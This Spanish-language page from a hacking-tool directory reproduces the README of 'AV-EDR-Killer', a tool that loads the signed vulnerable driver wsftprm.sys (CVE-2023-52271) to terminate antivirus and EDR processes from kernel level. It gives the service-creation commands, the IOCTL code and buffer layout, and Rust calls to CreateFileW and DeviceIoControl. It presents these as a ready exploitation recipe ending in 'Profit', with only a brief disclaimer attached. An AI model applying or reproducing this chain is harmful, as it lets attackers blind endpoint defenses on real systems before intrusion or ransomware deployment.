Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
AV-EDR-Killer — Terminación de procesos de AV/EDR mediante la explotación de un controlador vulnerable (BYOVD) | Kitploit
Herramientas/GitHubGitHub/xm0kht4r/av-edr-killer
Escalada de PrivilegiosMecanismos de PersistenciaExplotaciónEvasión de IDS/IPSMovimiento LateralPost-ExplotaciónComando y ControlRed Teaming
GitHubxm0kht4r/av-edr-killer

AV-EDR-Killer

Terminación de procesos de AV/EDR mediante la explotación de un controlador vulnerable (BYOVD)

Ver Repositorio
29646hace 7 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

AV/EDR Killer

https://github.com/user-attachments/assets/1eda3340-2af2-4136-b74e-be7a3f4b3924

Este proyecto demuestra cómo un controlador legítimo y firmado puede ser armado para obtener acceso a nivel de kernel.

🚨 El controlador vulnerable:

wsftprm.sys, firmado por TPZ SOLUCOES DIGITAIS LTDA, y previamente expuesto a una vulnerabilidad de escalada de privilegios local divulgada públicamente como CVE-2023-52271, pero de alguna manera todavía NO en la lista de bloqueo de controladores de Microsoft!! 🤫🤫

La vulnerabilidad se activa a través del código IOCTL 0x22201C con un búfer de 1036 bytes donde los primeros 4 bytes contienen el ID del proceso objetivo como DWORD. El controlador vulnerable, al recibir este IOCTL malicioso a través de DeviceIoControl, invoca la función importada ZwTerminateProcess, otorgando a cualquier aplicación de modo usuario capacidades de terminación de procesos a nivel de kernel.

Cualquier actor de amenazas sensato priorizará naturalmente esta capacidad para terminar procesos críticos de Antivirus (AV) y Detección y Respuesta en Endpoints (EDR).

⚡ Explotación:

1. Registrar un servicio:

Ejecute cmd.exe con privilegios de Administrador, y registre un servicio de controlador de kernel con tipo "kernel" y binPath apuntando a la ubicación del controlador vulnerable.

root@kitploit:~
> sc create MalDriver binPath= <path> type= Kernel`
> sc start MalDriver

Una vez cargado, el controlador crea un enlace simbólico accesible en modo usuario como \.\Warsaw_PM. El cual podemos usar para obtener un identificador al dispositivo del controlador mediante la llamada API CreateFileW.

root@kitploit:~
> CreateFileW(device_name.as_ptr(), GENERIC_READ | GENERIC_WRITE, 0, ptr::null_mut(), OPEN_EXISTING, 0, ptr::null_mut())

Para enviar los IOCTLs maliciosos usaremos DeviceIoControl con código 0x22201C, y un búfer que contenga un PID en sus primeros 4 bytes.

root@kitploit:~
> DeviceIoControl(self.hDriver, 0x22201C, buffer.as_mut_ptr() as LPVOID, buffer.len() as u32, ptr::null_mut(), 0, &mut bytes_returned, ptr::null_mut())

2. Profit

Cargo build --release para generar el binario.

🛠️ Personalización:

Puede agregar procesos adicionales a la lista de objetivos para su terminación.

🔒 DESCARGO DE RESPONSABILIDAD

Usted es responsable de asegurarse de tener la autorización adecuada antes de usar esta herramienta. El autor no asume ninguna responsabilidad por el mal uso.

🤝 Colaboraciones

¡Las contribuciones y sugerencias son bienvenidas! Si tienes ideas, mejoras o te gustaría colaborar, no dudes en contactar a: [email protected]

Descargar herramienta